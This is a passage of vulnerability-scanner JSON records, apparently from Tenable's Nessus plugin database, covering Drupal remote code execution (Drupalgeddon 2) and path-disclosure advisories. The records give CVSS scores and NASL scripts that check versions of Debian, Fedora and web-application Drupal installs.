script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/25\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:drupal:drupal\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"drupal_detect.nasl\");\n script_require_keys(\"installed_sw/Drupal\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"http.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_http_port(default:80, php:TRUE);\n\napp_info = vcf::get_app_info(app:\"Drupal\", port:port, webapp:true);\n\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { \"min_version\" : \"7.0\", \"max_version\" : \"7.58\", \"fixed_version\" : \"7.59\" },\n { \"min_version\" : \"8.4.0\", \"max_version\" : \"8.4.7\", \"fixed_version\" : \"8.4.8\" },\n { \"min_version\" : \"8.5.0\", \"max_version\" : \"8.5.2\", \"fixed_version\" : \"8.5.3\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:44:33", "description": "A remote code execution vulnerability has been found within multiple subsystems of Drupal. 
This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 7.14-2+deb7u19.\n\nWe recommend that you upgrade your drupal7 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-27T00:00:00", "type": "nessus", "title": "Debian DLA-1365-1 : drupal7 security update (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2022-04-22T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:drupal7", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-1365.NASL", "href": "https://www.tenable.com/plugins/nessus/109381", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian 
Security Advisory DLA-1365-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(109381);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/22\");\n\n script_cve_id(\"CVE-2018-7602\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n\n script_name(english:\"Debian DLA-1365-1 : drupal7 security update (Drupalgeddon 2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote code execution vulnerability has been found within multiple\nsubsystems of Drupal. This potentially allows attackers to exploit\nmultiple attack vectors on a Drupal site, which could result in the\nsite being compromised.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n7.14-2+deb7u19.\n\nWe recommend that you upgrade your drupal7 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.debian.org/debian-lts-announce/2018/04/msg00030.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/wheezy/drupal7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the affected drupal7 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 7 SA-CORE-2018-004 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"drupal7\", reference:\"7.14-2+deb7u19\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:51:53", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.1.x < 8.5.3 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98577", "href": "https://www.tenable.com/plugins/was/98577", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:51:35", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 7.x < 7.59 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], 
"modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98579", "href": "https://www.tenable.com/plugins/was/98579", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:25:18", "description": "Fix for CVE-2012-2922, path disclosure vulnerability.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2012-06-04T00:00:00", "type": "nessus", "title": "Fedora 15 : drupal7-7.14-2.fc15 (2012-8360)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:drupal7", "cpe:/o:fedoraproject:fedora:15"], "id": "FEDORA_2012-8360.NASL", "href": "https://www.tenable.com/plugins/nessus/59340", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-8360.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59340);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-2922\");\n script_xref(name:\"FEDORA\", 
value:\"2012-8360\");\n\n script_name(english:\"Fedora 15 : drupal7-7.14-2.fc15 (2012-8360)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2012-2922, path disclosure vulnerability.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=824631\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=824632\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-June/081662.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?038256a4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected drupal7 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n 
script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"drupal7-7.14-2.fc15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal7\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T14:24:32", "description": "Fix for CVE-2012-2922, path disclosure vulnerability.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2012-06-04T00:00:00", "type": "nessus", "title": "Fedora 16 : drupal7-7.14-2.fc16 (2012-8362)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:drupal7", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2012-8362.NASL", "href": "https://www.tenable.com/plugins/nessus/59341", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-8362.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59341);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-2922\");\n script_xref(name:\"FEDORA\", value:\"2012-8362\");\n\n script_name(english:\"Fedora 16 : drupal7-7.14-2.fc16 (2012-8362)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2012-2922, path disclosure vulnerability.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora 
security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=824631\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=824632\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-June/081661.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?929e9fe9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected drupal7 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 
\"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"drupal7-7.14-2.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal7\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T14:24:40", "description": "Fix for CVE-2012-2922, path disclosure vulnerability.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2012-06-04T00:00:00", "type": "nessus", "title": "Fedora 17 : drupal7-7.14-2.fc17 (2012-8398)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:drupal7", "cpe:/o:fedoraproject:fedora:17"], "id": "FEDORA_2012-8398.NASL", "href": "https://www.tenable.com/plugins/nessus/59345", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-8398.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59345);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-2922\");\n script_xref(name:\"FEDORA\", value:\"2012-8398\");\n\n script_name(english:\"Fedora 17 : drupal7-7.14-2.fc17 (2012-8398)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2012-2922, path disclosure vulnerability.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora 
security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=824631\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=824632\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-June/081721.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?299b8555\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected drupal7 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 
\"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"drupal7-7.14-2.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal7\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T14:46:46", "description": "- https://www.drupal.org/project/drupal/releases/8.4.8\n\n - https://www.drupal.org/SA-CORE-2018-004\n\n- https://www.drupal.org/project/drupal/releases/8.4.7\n\n - https://www.drupal.org/sa-core-2018-003\n\nRPM update: `drupal8-rpmbuild` package dependencies fixed\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-01-03T00:00:00", "type": "nessus", "title": "Fedora 28 : drupal8 (2018-8fd924a53d) (Drupalgeddon 2)", 
"bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602", "CVE-2018-9861"], "modified": "2022-04-22T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:drupal8", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-8FD924A53D.NASL", "href": "https://www.tenable.com/plugins/nessus/120613", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-8fd924a53d.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120613);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/22\");\n\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\");\n script_xref(name:\"FEDORA\", value:\"2018-8fd924a53d\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n\n script_name(english:\"Fedora 28 : drupal8 (2018-8fd924a53d) (Drupalgeddon 2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"- https://www.drupal.org/project/drupal/releases/8.4.8\n\n - https://www.drupal.org/SA-CORE-2018-004\n\n- 